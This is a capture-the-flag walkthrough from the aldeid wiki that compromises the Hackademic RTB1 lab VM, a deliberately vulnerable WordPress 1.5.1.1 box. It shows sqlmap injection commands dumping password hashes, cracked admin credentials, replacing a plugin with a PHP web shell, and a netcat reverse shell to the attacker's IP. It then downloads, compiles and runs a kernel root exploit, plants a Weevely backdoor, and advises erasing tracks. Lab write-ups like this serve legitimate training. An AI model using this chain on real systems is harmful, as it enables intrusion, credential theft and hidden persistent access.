Hackademic-RTB1

From aldeid
Jump to: navigation, search

Introduction

Description

Hackademic RTB1 is a realistic hacking challenge based on a deliberately vulnerable virtual box running a web service (wordpress). You will learn how to exploit a sql injection, escalate privileges, remove your tracks and maintain your accesses.

Installation

Hackademic RTB1 is a virtualmachine that you can download here: https://rapidshare.com/files/3944826991/Hackademic.RTB1.zip. Once downloaded, check the MD5Sum:

$ md5sum Hackademic.RTB1.zip
c972e899a8b5a745963bef78fbcaec6f  Hackademic.RTB1.zip

Unzip and import Hackademic.RTB1.vmx in VMWare.

The network interface is NATed and should normally automatically have an IP address from your DHCP server.

Environment

  • The virtual box (target) is running a Fedora based Linux distribution and will have the NATed IP address 192.168.1.30.
  • Our attacker's machine will have IP 192.168.1.43

Challenge

Assessment

Services/Versions

The very first stage is to gather as much information about the target as possible. On common thing is to scan the target with Nmap:

[email protected]:~# nmap -sS -A 192.168.1.27

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-19 07:06 CET
Nmap scan report for 192.168.1.27
Host is up (0.00033s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Hackademic.RTB1  
MAC Address: 00:0C:29:BE:0C:F2 (VMware)
Aggressive OS guesses: Linux 2.6.22 - 2.6.36 (98%), Linux 2.6.23 - 2.6.38 (95%), Linux 2.6.31 - 2.6.35 (95%), Linux 2.6.9 - 2.6.27 (95%), Linux 2.6.39 (94%), Linux 2.6.22 (93%), Linux 2.6.20 (93%), Linux 2.6.20 (Ubuntu, x86_64) (93%), Linux 2.6.24 - 2.6.36 (93%), Linux 2.6.31 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 192.168.1.27

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.62 seconds

We know that the target is running a web service on port 80/tcp and that a SSH service seems to be installed on port 22/tcp but the service isn't started.

Web service

The webservice is hosting a wordpress application (version 1.5.1.1):

Hackademic-001.png

This is a very old version (at the time of this writing, latest available version for wordpress is 3.3.1).

Find vulnerabilities

With such an outdated version, it's easy to find a bunch of vulnerabilities with Google... :)

However, if you wish, you can use vulnerabilities scanners like Nikto or W3AF to find sql injections. Without much efforts, you will find a vulnerable parameter "cat" (categories) that will be our entry point:

Hackademic-002.png

Exploit vulnerabilities

Database reverse engineering

Sqlmap is one of the most advanced tool to exploit an sql injection. We highly suspect that the database is MySQL (--dbms=MySQL). We also provide the url (-u parameter):

$ ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL
[...]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace
    Payload: cat=(SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x3a6664743a,(SELECT
        (CASE WHEN (3964=3964) THEN 1 ELSE 0 END)),0x3a756a693a,FLOOR(RAND(0)*2)
        )x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

[17:09:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
[17:09:05] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times
[17:09:05] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.30'

Sqlmap confirms the SQL injection. We are now going to list the databases:

$ ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL --dbs
[...]
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress

We immediately notice the presence of the wordpress database. The objective is to find the users tables. Let's first list the tables this database contains:

$ ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL \
    -D wordpress --tables
[...]
Database: wordpress
[9 tables]
+-------------------+
| wp_categories     |
| wp_comments       |
| wp_linkcategories |
| wp_links          |
| wp_options        |
| wp_post2cat       |
| wp_postmeta       |
| wp_posts          |
| wp_users          |
+-------------------+

The table we are interested in is wp_users. Let's see it's structure to only gather the login/password combinations:

$ ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL \
   -D wordpress -T wp_users --columns
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_aim            | varchar(50)         |
| user_browser        | varchar(200)        |
| user_description    | longtext            |
| user_domain         | varchar(200)        |
| user_email          | varchar(100)        |
| user_firstname      | varchar(50)         |
| user_icq            | int(10) unsigned    |
| user_idmode         | varchar(20)         |
| user_ip             | varchar(15)         |
| user_lastname       | varchar(50)         |
| user_level          | int(2) unsigned     |
| user_login          | varchar(60)         |
| user_msn            | varchar(100)        |
| user_nicename       | varchar(50)         |
| user_nickname       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
| user_yim            | varchar(50)         |
+---------------------+---------------------+

Let's dump the content of this table for only these 2 columns: user_login and user_pass:

# ./sqlmap.py -u http://192.168.1.30/Hackademic_RTB1/?cat=oops --dbms=MySQL \
   -D wordpress -T wp_users --dump -C user_login,user_pass
+--------------+----------------------------------+
| user_login   | user_pass                        |
+--------------+----------------------------------+
| NickJames    | 21232f297a57a5a743894a0e4a801fc3 |
| MaxBucky     | 50484c19f1afdaf3841a0d821ed393d2 |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 |
| TonyBlack    | a6e514f9486b83cb53d8d932f9a04292 |
| JohnSmith    | b986448f0bb9e5e124ca91d3d650f52c |
+--------------+----------------------------------+

Crack hashes

Let's try to crack the hashes with http://www.onlinehashcrack.com/

login reversed password
NickJames not found
MaxBucky kernel
GeorgeMiller q1w2e3
JasonKonnors maxwell
TonyBlack not found
JohnSmith not found

Privilege escalation

Access the admin panel of wordpress

Let's try some of the accounts against the admin panel of wordpress: http://192.168.1.30/Hackademic_RTB1/wp-login.php.

Notice that only GeorgeMiller is full admin. We will use his account.

Modify a plugin to create a PHP based shell

Wordpress offers the possibility to modify the plugins online. Our account has privileges to modify the plugins. We will modify the PHP code to make a PHP shell.

Hackademic-003.png

First download a PHP shell (e.g. http://itsecteam.com/files/itsecteam_shell_2.1.rar) and replace the code of one of the plugins (e.g. http://192.168.1.30/Hackademic_RTB1/wp-admin/plugin-editor.php?file=hello.php&a=te) with the PHP shell (itsecteam_shell.php). Then click on the "Update File" button.

Once done, you should be able to access the PHP shell: http://192.168.1.27/Hackademic_RTB1/wp-content/plugins/hello.php.

Hackademic-004.png

Use a reverse shell

One of the cool features that is shipped with this PHP shell is the reverse shell. It will open a connection on a given port between the attacker's machine and the victim's one.

From your backtrack distribution, open a socket on port 5555/tcp with netcat:

# nc -lvvp 5555

From the PHP shell interface, click on "Back Connect" from the top menu and fill in the "Back Connect" fields as follows:

  • IP address: 192.168.1.43 (attacker)
  • port: 5555 (you can leave this value)

Then click on the "Connect" button.

Every command that we will enter in our Backtrack terminal will be executed on the target's machine and we will get the output. Let's try some commands:

[email protected]:/pentest/database/sqlmap# nc -lvvp 5555
listening on [any] 5555 ...
192.168.1.30: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.43] from (UNKNOWN) [192.168.1.30] 44009
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
php --version
PHP 5.3.3 (cli) (built: Jul 22 2010 16:20:45) 
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies

kernel exploit to become root

Assessment

At this stage, we have a session on the target but as you can see with the "id" command, every command is executed under the "apache" user who has no root privileges.

We have to find an exploit that will elevate our privileges and enable to become root.

Here is the information we have about our target:

installed version latest available version*
OS Fedora 12 Fedora 16
kernel 2.6.31.5-127.fc12.i686 3.3.1
PHP 5.3.3 5.3.10 / 5.4.0
Wordpress 1.5.1.1 3.3.1

(*) lastest stable available version at the time of this writing.

The most outdated version, the most chances we will have to find an exploit. The OS and hence the kernel is quite outdated. Let's try to find an exploit that will work for this version. Terms to search for are "privilege escalation 2.6.31.5".

Find the appropriate exploit

Exploits can be found on these resources:

After some researches, we find an exploit that works: http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c

/* 
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg <[email protected]>
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */

Download the exploit

Still from our BackTrack distro (via the reverse shell), download the exploit:

wget http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c
--2012-04-02 16:48:16--  http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c
Resolving downloads.securityfocus.com... 143.127.139.111
Connecting to downloads.securityfocus.com|143.127.139.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6804 (6.6K) [text/plain]
Saving to: `44219.c'

     0K ......                                                100% 33.5K=0.2s

2012-04-02 16:48:17 (33.5 KB/s) - `44219.c' saved [6804/6804]

Compile the exploit

Then run following command to compile the exploit:

gcc -o x 44219.c

Run the exploit

To run the exploit, just issue:

./x
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...

Once done, check that you're now root:

id
uid=0(root) gid=0(root)

It works!

Maintain access

Generate the backdoor

The next stage is to maintain our access to the server. We are going to use Weevely. We must first generate the backddor:

[email protected]:/pentest/backdoors/web/weevely# ./weevely.py generate "SBKJ3Hdkjhbnn" plugins.php
Weevely 0.5.1 - Generate and manage stealth PHP backdoors
              Emilio Pinna 2011-2012            

+ Backdoor file 'plugins.php' created with password 'SBKJ3Hdkjhbnn'.

where:

  • SBKJ3Hdkjhbnn: in order to prevent anyone from using our backdoor, we protect its access with a password
  • plugins.php is the name of the backdoor we have created.

Transfer the backdoor to the server

From the PHP shell, click on "File Manager" from the top menu and either use the upload feature to upload the PHP backdoor or create a file named plugins.php and edit the content:

Hackademic-005.png

Test the backdoor

[email protected]:/pentest/backdoors/web/weevely# ./weevely.py http://192.168.1.30/Hackademic_RTB1/wp-content/plugins/plugins.php "SBKJ3Hdkjhbnn" 

Weevely 0.5.1 - Generate and manage stealth PHP backdoors
              Emilio Pinna 2011-2012            

[+] Starting terminal. Shell probe may take a while...
[shell.php] Loaded using 'Cookie' encapsulation
[shell.sh] Loaded using method 'system'

[shell.sh] Show help with :help command
[shell.sh] Run modules with :<module> <arg 1> ... <arg N>

[email protected]:/var/www/html/Hackademic_RTB1/wp-content/plugins$ id
uid=48(apache) gid=489(apache) groups=489(apache)
[email protected]:/var/www/html/Hackademic_RTB1/wp-content/plugins$ ifconfig
eth1      Link encap:Ethernet  HWaddr 00:0C:29:BE:0C:F2  
          inet addr:192.168.1.30  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: 2a01:e35:8b15:3430:20c:29ff:febe:cf2/64 Scope:Global
          inet6 addr: fe80::20c:29ff:febe:cf2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:15751 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12040 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2311425 (2.2 MiB)  TX bytes:5605020 (5.3 MiB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:240 (240.0 b)  TX bytes:240 (240.0 b)

Remove tracks

Do not forget this important part: remove your tracks. Now that you're root on the machine, it shouldn't be difficult ;-) Also think of restoring the wordpress plugin that you have modified to create your PHP shell.

Comments

blog comments powered by Disqus